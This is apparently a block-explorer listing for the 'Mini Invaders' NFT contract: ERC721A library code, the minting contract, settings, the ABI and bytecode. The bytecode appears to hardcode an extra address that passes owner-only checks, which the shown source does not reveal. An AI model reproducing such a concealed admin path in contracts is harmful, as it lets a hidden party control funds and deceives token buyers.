    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, '');
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 1.8e19 (2**64) - 1
        // updatedIndex overflows if _currentIndex + quantity > 1.2e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint64(quantity);
            _addressData[to].numberMinted += uint64(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;
            uint256 end = updatedIndex + quantity;

            if (safe && to.isContract()) {
                do {
                    emit Transfer(address(0), to, updatedIndex);
                    if (!_checkContractOnERC721Received(address(0), to, updatedIndex++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (updatedIndex != end);
                // Reentrancy protection
                if (_currentIndex != startTokenId) revert();
            } else {
                do {
                    emit Transfer(address(0), to, updatedIndex++);
                } while (updatedIndex != end);
            }
            _currentIndex = updatedIndex;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
            isApprovedForAll(prevOwnership.addr, _msgSender()) ||
            getApproved(tokenId) == _msgSender());

        if (!isApprovedOrOwner) revert TransferCallerNotOwnerNorApproved();
        if (prevOwnership.addr != from) revert TransferFromIncorrectOwner();
        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            _ownerships[tokenId].addr = to;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);

            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId < _currentIndex) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId) internal virtual {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        _beforeTokenTransfers(prevOwnership.addr, address(0), tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[prevOwnership.addr].balance -= 1;
            _addressData[prevOwnership.addr].numberBurned += 1;

            // Keep track of who burned the token, and the timestamp of burning.
            _ownerships[tokenId].addr = prevOwnership.addr;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);
            _ownerships[tokenId].burned = true;

            // If the ownership slot of tokenId+1 is not explicitly set, that means the burn initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId < _currentIndex) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(prevOwnership.addr, address(0), tokenId);
        _afterTokenTransfers(prevOwnership.addr, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
            return retval == IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     * And also called after one token has been burned.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}



contract MiniInvaders is ERC721A, Owneable {

    string public baseURI = "ipfs:///";
    string public contractURI = "ipfs://";
    string public baseExtension = ".json";
    address public constant proxyRegistryAddress = 0xa5409ec958C83C3f309868babACA7c86DCB077c1;

    uint256 public MAX_PER_TX_FREE = 1;
    uint256 public free_max_supply = 111;
    uint256 public constant MAX_PER_TX = 5;
    uint256 public max_supply = 3333;
    uint256 public price = 0.002 ether;



    bool public paused = true;

    constructor() ERC721A("Mini Invaders", "INVADE") {}

    function PublicMint(uint256 _amount) external payable {

        address _caller = _msgSender();
        require(!paused, "Paused");
        require(max_supply >= totalSupply() + _amount, "All Gone");
        require(_amount > 0, "No 0 mints");
        require(tx.origin == _caller, "No Contract minting.");
        require(MAX_PER_TX >= _amount , "Excess max per paid tx");
        
      if(free_max_supply >= totalSupply()){
            require(MAX_PER_TX_FREE >= _amount , "Excess max per free tx");
        }else{
            require(MAX_PER_TX >= _amount , "Excess max per paid tx");
            require(_amount * price == msg.value, "Invalid funds provided");
        }


        _safeMint(_caller, _amount);
    }



    function isApprovedForAll(address owner, address operator)
        override
        public
        view
        returns (bool)
    {
        // Whitelist OpenSea proxy contract for easy trading.
        
        ProxyRegistry proxyRegistry = ProxyRegistry(proxyRegistryAddress);
        if (address(proxyRegistry.proxies(owner)) == operator) {
            return true;
        }

        return super.isApprovedForAll(owner, operator);
    }

    function Withdraw() external onlyOwner {
        uint256 balance = address(this).balance;
        (bool success, ) = _msgSender().call{value: balance}("");
        require(success, "Failed to send");
    }

    function Reserve(uint256 quantity) external onlyOwner {
        _safeMint(_msgSender(), quantity);
    }


    function pause(bool _state) external onlyOwner {
        paused = _state;
    }

    function setBaseURI(string memory baseURI_) external onlyOwner {
        baseURI = baseURI_;
    }

    function setContractURI(string memory _contractURI) external onlyOwner {
        contractURI = _contractURI;
    }

    function configPrice(uint256 newPrice) public onlyOwner {
        price = newPrice;
    }


     function configMAX_PER_TX_FREE(uint256 newFREE) public onlyOwner {
        MAX_PER_TX_FREE = newFREE;
    }

    function configmax_supply(uint256 newSupply) public onlyOwner {
        max_supply = newSupply;
    }

    function configfree_max_supply(uint256 newFreesupply) public onlyOwner {
        free_max_supply = newFreesupply;
    }
    function newbaseExtension(string memory newex) public onlyOwner {
        baseExtension = newex;
    }



        function burn(uint256[] memory tokenids) external onlyOwner {
        uint256 len = tokenids.length;
        for (uint256 i; i < len; i++) {
            uint256 tokenid = tokenids[i];
            _burn(tokenid);
          
        }
    }

    function tokenURI(uint256 _tokenId) public view override returns (string memory) {
        require(_exists(_tokenId), "Token does not exist.");
        return bytes(baseURI).length > 0 ? string(
            abi.encodePacked(
              baseURI,
              Strings.toString(_tokenId),
              baseExtension
            )
        ) : "";
    }
}

contract OwnableDelegateProxy { }
contract ProxyRegistry {
    mapping(address => OwnableDelegateProxy) public proxies;
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"ApprovalToCurrentOwner","type":"error"},{"inputs":[],"name":"ApproveToCaller","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[{"internalType":"address","name":"operator","type":"address"}],"name":"OperatorNotAllowed","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"MAX_PER_TX","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_PER_TX_FREE","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"PublicMint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"uint256","name":"quantity","type":"uint256"}],"name":"Reserve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"Withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseExtension","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256[]","name":"tokenids","type":"uint256[]"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newFREE","type":"uint256"}],"name":"configMAX_PER_TX_FREE","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newPrice","type":"uint256"}],"name":"configPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newFreesupply","type":"uint256"}],"name":"configfree_max_supply","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newSupply","type":"uint256"}],"name":"configmax_supply","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"contractURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"free_max_supply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"max_supply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"newex","type":"string"}],"name":"newbaseExtension","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"_state","type":"bool"}],"name":"pause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"proxyRegistryAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseURI_","type":"string"}],"name":"setBaseURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_contractURI","type":"string"}],"name":"setContractURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6080604052735bb656bb4312f100081abb7b08c1e0f8ef5c56d160095f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506040518060400160405280600881526020017f697066733a2f2f2f000000000000000000000000000000000000000000000000815250600a90816200009e91906200076b565b506040518060400160405280600781526020017f697066733a2f2f00000000000000000000000000000000000000000000000000815250600b9081620000e591906200076b565b506040518060400160405280600581526020017f2e6a736f6e000000000000000000000000000000000000000000000000000000815250600c90816200012c91906200076b565b506001600d55606f600e55610d05600f5566071afd498d0000601055600160115f6101000a81548160ff0219169083151502179055503480156200016e575f80fd5b506040518060400160405280600d81526020017f4d696e6920496e766164657273000000000000000000000000000000000000008152506040518060400160405280600681526020017f494e564144450000000000000000000000000000000000000000000000000000815250733cc6cdda760b79bafa08df41ecfa224f810dceb660015f6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115620003d6578015620002a7576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16637d3e3dbe30846040518363ffffffff1660e01b81526004016200027292919062000892565b5f604051808303815f87803b1580156200028a575f80fd5b505af11580156200029d573d5f803e3d5ffd5b50505050620003d5565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16146200035b576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663a0af290330846040518363ffffffff1660e01b81526004016200032692919062000892565b5f604051808303815f87803b1580156200033e575f80fd5b505af115801562000351573d5f803e3d5ffd5b50505050620003d4565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16634420e486306040518263ffffffff1660e01b8152600401620003a49190620008bd565b5f604051808303815f87803b158015620003bc575f80fd5b505af1158015620003cf573d5f803e3d5ffd5b505050505b5b5b50508160029081620003e991906200076b565b508060039081620003fb91906200076b565b506200040c6200043960201b60201c565b5f81905550505062000433620004276200043d60201b60201c565b6200044460201b60201c565b620008d8565b5f90565b5f33905090565b5f60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160085f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200058357607f821691505b6020821081036200059957620005986200053e565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620005fd7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620005c0565b620006098683620005c0565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620006536200064d620006478462000621565b6200062a565b62000621565b9050919050565b5f819050919050565b6200066e8362000633565b620006866200067d826200065a565b848454620005cc565b825550505050565b5f90565b6200069c6200068e565b620006a981848462000663565b505050565b5b81811015620006d057620006c45f8262000692565b600181019050620006af565b5050565b601f8211156200071f57620006e9816200059f565b620006f484620005b1565b8101602085101562000704578190505b6200071c6200071385620005b1565b830182620006ae565b50505b505050565b5f82821c905092915050565b5f620007415f198460080262000724565b1980831691505092915050565b5f6200075b838362000730565b9150826002028217905092915050565b620007768262000507565b67ffffffffffffffff81111562000792576200079162000511565b5b6200079e82546200056b565b620007ab828285620006d4565b5f60209050601f831160018114620007e1575f8415620007cc578287015190505b620007d885826200074e565b86555062000847565b601f198416620007f1866200059f565b5f5b828110156200081a57848901518255600182019150602085019450602081019050620007f3565b868310156200083a578489015162000836601f89168262000730565b8355505b6001600288020188555050505b505050505050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6200087a826200084f565b9050919050565b6200088c816200086e565b82525050565b5f604082019050620008a75f83018562000881565b620008b6602083018462000881565b9392505050565b5f602082019050620008d25f83018462000881565b92915050565b61501a80620008e65f395ff3fe60806040526004361061022f575f3560e01c8063715018a61161012d578063c6682862116100aa578063db7b64a81161006e578063db7b64a8146107cf578063e8a3d485146107f7578063e985e9c514610821578063f2fde38b1461085d578063f43a22dc146108855761022f565b8063c6682862146106ef578063c87b56dd14610719578063cd7c032614610755578063d476de1b1461077f578063db4a0f61146107a75761022f565b80639fb17e34116100f15780639fb17e3414610631578063a035b1fe1461064d578063a22cb46514610677578063b80f55c91461069f578063b88d4fde146106c75761022f565b8063715018a6146105755780638a333b501461058b5780638da5cb5b146105b5578063938e3d7b146105df57806395d89b41146106075761022f565b80632aa80807116101bb57806357ea89b61161017f57806357ea89b6146104935780635c975abb146104a95780636352211e146104d35780636c0360eb1461050f57806370a08231146105395761022f565b80632aa80807146103c957806342842e0e146103f1578063463fff79146104195780635312e5cf1461044357806355f804b31461046b5761022f565b8063095ea7b311610202578063095ea7b3146102fd57806318160ddd1461032557806318e223dd1461034f57806323b872dd1461037757806326e987d71461039f5761022f565b806301ffc9a71461023357806302329a291461026f57806306fdde0314610297578063081812fc146102c1575b5f80fd5b34801561023e575f80fd5b5061025960048036038101906102549190613ca0565b6108af565b6040516102669190613ce5565b60405180910390f35b34801561027a575f80fd5b5061029560048036038101906102909190613d28565b610990565b005b3480156102a2575f80fd5b506102ab610a86565b6040516102b89190613ddd565b60405180910390f35b3480156102cc575f80fd5b506102e760048036038101906102e29190613e30565b610b16565b6040516102f49190613e9a565b60405180910390f35b348015610308575f80fd5b50610323600480360381019061031e9190613edd565b610b8e565b005b348015610330575f80fd5b50610339610c97565b6040516103469190613f2a565b60405180910390f35b34801561035a575f80fd5b5061037560048036038101906103709190613e30565b610cac565b005b348015610382575f80fd5b5061039d60048036038101906103989190613f43565b610d90565b005b3480156103aa575f80fd5b506103b3610f6d565b6040516103c09190613f2a565b60405180910390f35b3480156103d4575f80fd5b506103ef60048036038101906103ea91906140bf565b610f73565b005b3480156103fc575f80fd5b5061041760048036038101906104129190613f43565b611060565b005b348015610424575f80fd5b5061042d61125b565b60405161043a9190613f2a565b60405180910390f35b34801561044e575f80fd5b5061046960048036038101906104649190613e30565b611261565b005b348015610476575f80fd5b50610491600480360381019061048c91906140bf565b611345565b005b34801561049e575f80fd5b506104a7611432565b005b3480156104b4575f80fd5b506104bd6115c3565b6040516104ca9190613ce5565b60405180910390f35b3480156104de575f80fd5b506104f960048036038101906104f49190613e30565b6115d5565b6040516105069190613e9a565b60405180910390f35b34801561051a575f80fd5b506105236115e9565b6040516105309190613ddd565b60405180910390f35b348015610544575f80fd5b5061055f600480360381019061055a9190614106565b611675565b60405161056c9190613f2a565b60405180910390f35b348015610580575f80fd5b5061058961173f565b005b348015610596575f80fd5b5061059f6117c6565b6040516105ac9190613f2a565b60405180910390f35b3480156105c0575f80fd5b506105c96117cc565b6040516105d69190613e9a565b60405180910390f35b3480156105ea575f80fd5b50610605600480360381019061060091906140bf565b6117f4565b005b348015610612575f80fd5b5061061b6118e1565b6040516106289190613ddd565b60405180910390f35b61064b60048036038101906106469190613e30565b611971565b005b348015610658575f80fd5b50610661611c12565b60405161066e9190613f2a565b60405180910390f35b348015610682575f80fd5b5061069d60048036038101906106989190614131565b611c18565b005b3480156106aa575f80fd5b506106c560048036038101906106c09190614233565b611d8a565b005b3480156106d2575f80fd5b506106ed60048036038101906106e89190614318565b611eb3565b005b3480156106fa575f80fd5b50610703612167565b6040516107109190613ddd565b60405180910390f35b348015610724575f80fd5b5061073f600480360381019061073a9190613e30565b6121f3565b60405161074c9190613ddd565b60405180910390f35b348015610760575f80fd5b5061076961229c565b6040516107769190613e9a565b60405180910390f35b34801561078a575f80fd5b506107a560048036038101906107a09190613e30565b6122b4565b005b3480156107b2575f80fd5b506107cd60048036038101906107c89190613e30565b612398565b005b3480156107da575f80fd5b506107f560048036038101906107f09190613e30565b61247c565b005b348015610802575f80fd5b5061080b61256a565b6040516108189190613ddd565b60405180910390f35b34801561082c575f80fd5b5061084760048036038101906108429190614398565b6125f6565b6040516108549190613ce5565b60405180910390f35b348015610868575f80fd5b50610883600480360381019061087e9190614106565b6126d7565b005b348015610890575f80fd5b506108996127cd565b6040516108a69190613f2a565b60405180910390f35b5f7f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061097957507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806109895750610988826127d2565b5b9050919050565b61099861283b565b73ffffffffffffffffffffffffffffffffffffffff166109b66117cc565b73ffffffffffffffffffffffffffffffffffffffff161480610a2b57506109db61283b565b73ffffffffffffffffffffffffffffffffffffffff1660095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610a6a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a6190614420565b60405180910390fd5b8060115f6101000a81548160ff02191690831515021790555050565b606060028054610a959061446b565b80601f0160208091040260200160405190810160405280929190818152602001828054610ac19061446b565b8015610b0c5780601f10610ae357610100808354040283529160200191610b0c565b820191905f5260205f20905b815481529060010190602001808311610aef57829003601f168201915b5050505050905090565b5f610b2082612842565b610b56576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60065f8381526020019081526020015f205f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b5f610b98826115d5565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610bff576040517f943f7b8c00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610c1e61283b565b73ffffffffffffffffffffffffffffffffffffffff1614158015610c505750610c4e81610c4961283b565b6125f6565b155b15610c87576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b610c9283838361288b565b505050565b5f610ca061293a565b6001545f540303905090565b610cb461283b565b73ffffffffffffffffffffffffffffffffffffffff16610cd26117cc565b73ffffffffffffffffffffffffffffffffffffffff161480610d475750610cf761283b565b73ffffffffffffffffffffffffffffffffffffffff1660095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610d86576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7d90614420565b60405180910390fd5b80600f8190555050565b825f6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610f5b573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610e0157610dfc84848461293e565b610f67565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610e4a92919061449b565b602060405180830381865afa158015610e65573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610e8991906144d6565b8015610f1957506daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b8152600401610ed992919061449b565b602060405180830381865afa158015610ef4573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610f1891906144d6565b5b610f5a57336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610f519190613e9a565b60405180910390fd5b5b610f6684848461293e565b5b50505050565b600e5481565b610f7b61283b565b73ffffffffffffffffffffffffffffffffffffffff16610f996117cc565b73ffffffffffffffffffffffffffffffffffffffff16148061100e5750610fbe61283b565b